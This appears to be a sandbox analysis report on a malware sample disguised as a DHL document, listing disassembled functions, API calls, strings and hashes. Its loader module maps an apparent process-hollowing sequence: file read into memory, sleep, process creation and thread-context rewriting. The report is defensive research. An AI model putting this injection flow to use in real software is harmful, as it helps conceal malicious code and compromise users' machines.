                                                                                              • Part of subcall function 00822CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00822D42
                                                                                              • Part of subcall function 00822CD4: InitCommonControlsEx.COMCTL32(?), ref: 00822D5F
                                                                                              • Part of subcall function 00822CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00822D6F
                                                                                              • Part of subcall function 00822CD4: LoadIconW.USER32(000000A9), ref: 00822D85
                                                                                              • Part of subcall function 00822CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00822D94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                            • String ID: #$0$AutoIt v3
                                                                                            • API String ID: 423443420-4155596026
                                                                                            • Opcode ID: 9a549cde33834bcfb7512c5b301ef19107153687724b8be293e64062a1dd2c83
                                                                                            • Instruction ID: 335ec54c59725a0ef6c53703b3cb40a0102ad345dcae5da3dac51fcb241adac1
                                                                                            • Opcode Fuzzy Hash: 9a549cde33834bcfb7512c5b301ef19107153687724b8be293e64062a1dd2c83
                                                                                            • Instruction Fuzzy Hash: 85211870E40319EBDF109FAAEC59EAA7FB4FB48B50F00411AF600A67A0D7B90544CF94
                                                                                            Function 00823170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 443 823170-823185 444 823187-82318a 443->444 445 8231e5-8231e7 443->445 447 8231eb 444->447 448 82318c-823193 444->448 445->444 446 8231e9 445->446 449 8231d0-8231d8 DefWindowProcW 446->449 450 8231f1-8231f6 447->450 451 862dfb-862e23 call 8218e2 call 83e499 447->451 452 823265-82326d PostQuitMessage 448->452 453 823199-82319e 448->453 454 8231de-8231e4 449->454 456 8231f8-8231fb 450->456 457 82321d-823244 SetTimer RegisterWindowMessageW 450->457 489 862e28-862e2f 451->489 455 823219-82321b 452->455 459 8231a4-8231a8 453->459 460 862e7c-862e90 call 88bf30 453->460 455->454 461 823201-823214 KillTimer call 8230f2 call 823c50 456->461 462 862d9c-862d9f 456->462 457->455 464 823246-823251 CreatePopupMenu 457->464 465 8231ae-8231b3 459->465 466 862e68-862e72 call 88c161 459->466 460->455 484 862e96 460->484 461->455 468 862dd7-862df6 MoveWindow 462->468 469 862da1-862da5 462->469 464->455 473 862e4d-862e54 465->473 474 8231b9-8231be 465->474 480 862e77 466->480 468->455 476 862dc6-862dd2 SetFocus 469->476 477 862da7-862daa 469->477 473->449 478 862e5a-862e63 call 880ad7 473->478 482 823253-823263 call 82326f 474->482 483 8231c4-8231ca 474->483 476->455 477->483 485 862db0-862dc1 call 8218e2 477->485 478->449 480->455 482->455 483->449 483->489 484->449 485->455 489->449 490 862e35-862e48 call 8230f2 call 823837 489->490 490->449
                                                                                            APIs
                                                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0082316A,?,?), ref: 008231D8
                                                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,0082316A,?,?), ref: 00823204
                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00823227
                                                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0082316A,?,?), ref: 00823232
                                                                                            • CreatePopupMenu.USER32 ref: 00823246
                                                                                            • PostQuitMessage.USER32(00000000), ref: 00823267
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                            • String ID: TaskbarCreated
                                                                                            • API String ID: 129472671-2362178303
                                                                                            • Opcode ID: 320da1a549894a6b51c65c2bd70e9885d380a7f38ee5755a5e08d12a4d3f1ade
                                                                                            • Instruction ID: 581a51043ed5ae02d37b24a7bf741f76d267f2fe25209654549e9b6d06c7e0ba
                                                                                            • Opcode Fuzzy Hash: 320da1a549894a6b51c65c2bd70e9885d380a7f38ee5755a5e08d12a4d3f1ade
                                                                                            • Instruction Fuzzy Hash: 8D410431200228E7DF151B7CAC2DF793A69FB05345F540125F642D62A2DB6ADA80D7A6
                                                                                            Function 00B64270 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 499 b64270-b6431e call b61c90 502 b64325-b6434b call b65180 CreateFileW 499->502 505 b64352-b64362 502->505 506 b6434d 502->506 513 b64364 505->513 514 b64369-b64383 VirtualAlloc 505->514 507 b6449d-b644a1 506->507 508 b644e3-b644e6 507->508 509 b644a3-b644a7 507->509 515 b644e9-b644f0 508->515 511 b644b3-b644b7 509->511 512 b644a9-b644ac 509->512 516 b644c7-b644cb 511->516 517 b644b9-b644c3 511->517 512->511 513->507 518 b64385 514->518 519 b6438a-b643a1 ReadFile 514->519 520 b64545-b6455a 515->520 521 b644f2-b644fd 515->521 524 b644cd-b644d7 516->524 525 b644db 516->525 517->516 518->507 526 b643a3 519->526 527 b643a8-b643e8 VirtualAlloc 519->527 522 b6455c-b64567 VirtualFree 520->522 523 b6456a-b64572 520->523 528 b64501-b6450d 521->528 529 b644ff 521->529 522->523 524->525 525->508 526->507 532 b643ef-b6440a call b653d0 527->532 533 b643ea 527->533 530 b64521-b6452d 528->530 531 b6450f-b6451f 528->531 529->520 535 b6452f-b64538 530->535 536 b6453a-b64540 530->536 534 b64543 531->534 539 b64415-b6441f 532->539 533->507 534->515 535->534 536->534 540 b64452-b64466 call b651e0 539->540 541 b64421-b64450 call b653d0 539->541 547 b6446a-b6446e 540->547 548 b64468 540->548 541->539 549 b64470-b64474 CloseHandle 547->549 550 b6447a-b6447e 547->550 548->507 549->550 551 b64480-b6448b VirtualFree 550->551 552 b6448e-b64497 550->552 551->552 552->502 552->507
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00B64341
                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B64567
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileFreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 204039940-0
                                                                                            • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                            • Instruction ID: 4da838a7cd33468fbe144b62abe022e865f138f3fb549f37337ca97885eab110
                                                                                            • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                            • Instruction Fuzzy Hash: 7DA10674E00209EBDB14CFA4C995BEEBBB5FF48304F208599E205BB280DB799A41DB55
                                                                                            Function 00822C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 563 822c63-822cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                            APIs
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00822C91
                                                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00822CB2
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00821CAD,?), ref: 00822CC6
                                                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00821CAD,?), ref: 00822CCF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$CreateShow
                                                                                            • String ID: AutoIt v3$edit
                                                                                            • API String ID: 1584632944-3779509399
                                                                                            • Opcode ID: 31a35f7c24a1f856a0a57736f137a8a71e1b5699767547a6640be651b2a84916
                                                                                            • Instruction ID: 70ad7c9bf7791a212160772969069439f8fa7917ff4165f6e324b7ac6281e038
                                                                                            • Opcode Fuzzy Hash: 31a35f7c24a1f856a0a57736f137a8a71e1b5699767547a6640be651b2a84916
                                                                                            • Instruction Fuzzy Hash: 86F0DA76540290BAEB311727AC0CEB72EBDF7C7F60B10005AF900A67A0C6691854DAB4
                                                                                            Function 00B64040 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 678 b64040-b64173 call b61c90 call b63f30 CreateFileW 685 b64175 678->685 686 b6417a-b6418a 678->686 687 b6422a-b6422f 685->687 689 b64191-b641ab VirtualAlloc 686->689 690 b6418c 686->690 691 b641af-b641c6 ReadFile 689->691 692 b641ad 689->692 690->687 693 b641ca-b64204 call b63f70 call b62f30 691->693 694 b641c8 691->694 692->687 699 b64206-b6421b call b63fc0 693->699 700 b64220-b64228 ExitProcess 693->700 694->687 699->700 700->687
                                                                                            APIs
                                                                                              • Part of subcall function 00B63F30: Sleep.KERNELBASE(000001F4), ref: 00B63F41
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00B64169
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFileSleep
                                                                                            • String ID: WTL4V64ONXZZGWK34R
                                                                                            • API String ID: 2694422964-149578307
                                                                                            • Opcode ID: 10dfb706c1c42f36bffb97ea34da3edb2f312667f789c0da9729a4c36744578c
                                                                                            • Instruction ID: 980ec20bd484f2d877fd6f3a99f209322533c13974c915d2f96ecfe496bee7bd
                                                                                            • Opcode Fuzzy Hash: 10dfb706c1c42f36bffb97ea34da3edb2f312667f789c0da9729a4c36744578c
                                                                                            • Instruction Fuzzy Hash: 7D51A030D14288EAEF11DBA4C854BEFBBB9EF19300F104199E609BB2C0D7B91B44CB65
                                                                                            Function 00892947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892C05
                                                                                            • DeleteFileW.KERNEL32(?), ref: 00892C87
                                                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00892C9D
                                                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892CAE
                                                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00892CC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Delete$Copy
                                                                                            • String ID:
                                                                                            • API String ID: 3226157194-0
                                                                                            • Opcode ID: a8d2df07e4487e535605f213189664b85d5fe200cd1003a0f595977fe22a2f05
                                                                                            • Instruction ID: 96a616efab4f18c419453c464a31fd4d3619e0c50f6550cd6e8d26158f91589c
                                                                                            • Opcode Fuzzy Hash: a8d2df07e4487e535605f213189664b85d5fe200cd1003a0f595977fe22a2f05
                                                                                            • Instruction Fuzzy Hash: 13B13F72D0012DABDF21EBA8CC85EDEB7BDFF49354F1440A6F509E6151EA309A448F61
                                                                                            Function 00823B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 844 823b1c-823b27 845 823b99-823b9b 844->845 846 823b29-823b2e 844->846 847 823b8c-823b8f 845->847 846->845 848 823b30-823b48 RegOpenKeyExW 846->848 848->845 849 823b4a-823b69 RegQueryValueExW 848->849 850 823b80-823b8b RegCloseKey 849->850 851 823b6b-823b76 849->851 850->847 852 823b90-823b97 851->852 853 823b78-823b7a 851->853 854 823b7e 852->854 853->854 854->850
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B40
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B61
                                                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00823B0F,SwapMouseButtons,00000004,?), ref: 00823B83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseOpenQueryValue
                                                                                            • String ID: Control Panel\Mouse
                                                                                            • API String ID: 3677997916-824357125
                                                                                            • Opcode ID: 37f244bbddf17368a0d756e809f87ae40d544ee79b194411139e7fa122f3ac73
                                                                                            • Instruction ID: 82bbaf824d0c44d7d6c1a6dd89f0fe7d4407c154ca53852882964ef984317beb
                                                                                            • Opcode Fuzzy Hash: 37f244bbddf17368a0d756e809f87ae40d544ee79b194411139e7fa122f3ac73
                                                                                            • Instruction Fuzzy Hash: 01112AB5511218FFDB208FA5EC54AAFB7B8FF04754B104559B805D7110D2359E819B60
                                                                                            Function 00B62F30 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 855 b62f30-b62fd0 call b653b0 * 3 862 b62fe7 855->862 863 b62fd2-b62fdc 855->863 865 b62fee-b62ff7 862->865 863->862 864 b62fde-b62fe5 863->864 864->865 866 b62ffe-b636b0 865->866 867 b636b2-b636b6 866->867 868 b636c3-b636f0 CreateProcessW 866->868 869 b636fc-b63729 867->869 870 b636b8-b636bc 867->870 875 b636f2-b636f5 868->875 876 b636fa 868->876 886 b63733 869->886 887 b6372b-b6372e 869->887 871 b63735-b63762 870->871 872 b636be 870->872 874 b6376c-b63786 Wow64GetThreadContext 871->874 896 b63764-b63767 871->896 872->874 879 b6378d-b637a8 ReadProcessMemory 874->879 880 b63788 874->880 881 b63af1-b63af3 875->881 876->874 884 b637af-b637b8 879->884 885 b637aa 879->885 883 b63a9a-b63a9e 880->883 888 b63aa0-b63aa4 883->888 889 b63aef 883->889 891 b637e1-b63800 call b64a30 884->891 892 b637ba-b637c9 884->892 885->883 886->874 887->881 893 b63aa6-b63ab2 888->893 894 b63ab9-b63abd 888->894 889->881 904 b63807-b6382a call b64b70 891->904 905 b63802 891->905 892->891 897 b637cb-b637da call b64980 892->897 893->894 900 b63abf-b63ac2 894->900 901 b63ac9-b63acd 894->901 896->881 897->891 908 b637dc 897->908 900->901 906 b63acf-b63ad2 901->906 907 b63ad9-b63add 901->907 914 b63874-b63895 call b64b70 904->914 915 b6382c-b63833 904->915 905->883 906->907 910 b63adf-b63ae5 call b64980 907->910 911 b63aea-b63aed 907->911 908->883 910->911 911->881 921 b63897 914->921 922 b6389c-b638ba call b653d0 914->922 917 b63835-b63866 call b64b70 915->917 918 b6386f 915->918 925 b6386d 917->925 926 b63868 917->926 918->883 921->883 928 b638c5-b638cf 922->928 925->914 926->883 929 b63905-b63909 928->929 930 b638d1-b63903 call b653d0 928->930 932 b639f4-b63a11 call b64580 929->932 933 b6390f-b6391f 929->933 930->928 941 b63a13 932->941 942 b63a18-b63a37 Wow64SetThreadContext 932->942 933->932 936 b63925-b63935 933->936 936->932 937 b6393b-b6395f 936->937 940 b63962-b63966 937->940 940->932 943 b6396c-b63981 940->943 941->883 944 b63a3b-b63a46 call b648b0 942->944 945 b63a39 942->945 947 b63995-b63999 943->947 951 b63a4a-b63a4e 944->951 952 b63a48 944->952 945->883 949 b639d7-b639ef 947->949 950 b6399b-b639a7 947->950 949->940 953 b639d5 950->953 954 b639a9-b639d3 950->954 955 b63a50-b63a53 951->955 956 b63a5a-b63a5e 951->956 952->883 953->947 954->953 955->956 958 b63a60-b63a63 956->958 959 b63a6a-b63a6e 956->959 958->959 960 b63a70-b63a73 959->960 961 b63a7a-b63a7e 959->961 960->961 962 b63a80-b63a86 call b64980 961->962 963 b63a8b-b63a94 961->963 962->963 963->866 963->883
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00B636EB
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B63781
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B637A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                            • Instruction ID: a966eee52eccc7cfa26429c830c2a28d4774c1224868209d46af084eed3db90c
                                                                                            • Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
                                                                                            • Instruction Fuzzy Hash: 79621F70A14658DBEB24CFA4C851BDEB3B2EF58700F1091A9D10DEB390E7799E81CB59
                                                                                            Function 0082DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • Variable must be of type 'Object'., xrefs: 008732B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Variable must be of type 'Object'.
                                                                                            • API String ID: 0-109567571
                                                                                            • Opcode ID: 1ae883e6f54a95546d425c79977737ed728ec6240f67d3e4c8e5f9cb461ca799
                                                                                            • Instruction ID: fc60c7d49ce8262b0658dea7d9a85a9e3573afa5a6184b3fcffd625a776f0a39
                                                                                            • Opcode Fuzzy Hash: 1ae883e6f54a95546d425c79977737ed728ec6240f67d3e4c8e5f9cb461ca799
                                                                                            • Instruction Fuzzy Hash: 1CC29B71A00228CFCB24CF58D884AADB7B1FF18314F248569E956EB395D335ED81CB96
                                                                                            Function 00823923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008633A2
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00823A04
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                                                            • String ID: Line:
                                                                                            • API String ID: 2289894680-1585850449
                                                                                            • Opcode ID: 6c618e580f963a93ed85174cc310a5fb07b1bcbed58557c19145f5d026289b8a
                                                                                            • Instruction ID: 596d2b3cdbf66a18156418108fb8acf0c4599adf0bcdb1f4a862f67da3bc995e
                                                                                            • Opcode Fuzzy Hash: 6c618e580f963a93ed85174cc310a5fb07b1bcbed58557c19145f5d026289b8a
                                                                                            • Instruction Fuzzy Hash: 4331B271508324ABC725EB24EC59FEBB7D8FB45714F00492AF599C2291EB789688C7C3
                                                                                            Function 0083FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00840668
                                                                                              • Part of subcall function 008432A4: RaiseException.KERNEL32(?,?,?,0084068A,?,008F1444,?,?,?,?,?,?,0084068A,00821129,008E8738,00821129), ref: 00843304
                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00840685
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                                                            • String ID: Unknown exception
                                                                                            • API String ID: 3476068407-410509341
                                                                                            • Opcode ID: 89c2c25a8e391658a3dc1d412442f0db39a7bcfe5d251102664256ebc39ce415
                                                                                            • Instruction ID: 2596e75444e88dd7f38db77f9e7b11eb5795fdca16795e3ec50fb42e74ae3ea4
                                                                                            • Opcode Fuzzy Hash: 89c2c25a8e391658a3dc1d412442f0db39a7bcfe5d251102664256ebc39ce415
                                                                                            • Instruction Fuzzy Hash: 91F0C83490030DB78B00B6A8DC4AC9E776CFE50314B604531BA25D5592EF71DA15CDC2
                                                                                            Function 00893017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0089302F
                                                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00893044
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Temp$FileNamePath
                                                                                            • String ID: aut
                                                                                            • API String ID: 3285503233-3010740371
                                                                                            • Opcode ID: a7f808704a4f461f9186809402f1a9b486abe6c1ba7008f496a8dfbccce67b50
                                                                                            • Instruction ID: 9e57274a449e183c4b5b34e61760ed134b106ed9a64024cf272629444f85d975
                                                                                            • Opcode Fuzzy Hash: a7f808704a4f461f9186809402f1a9b486abe6c1ba7008f496a8dfbccce67b50
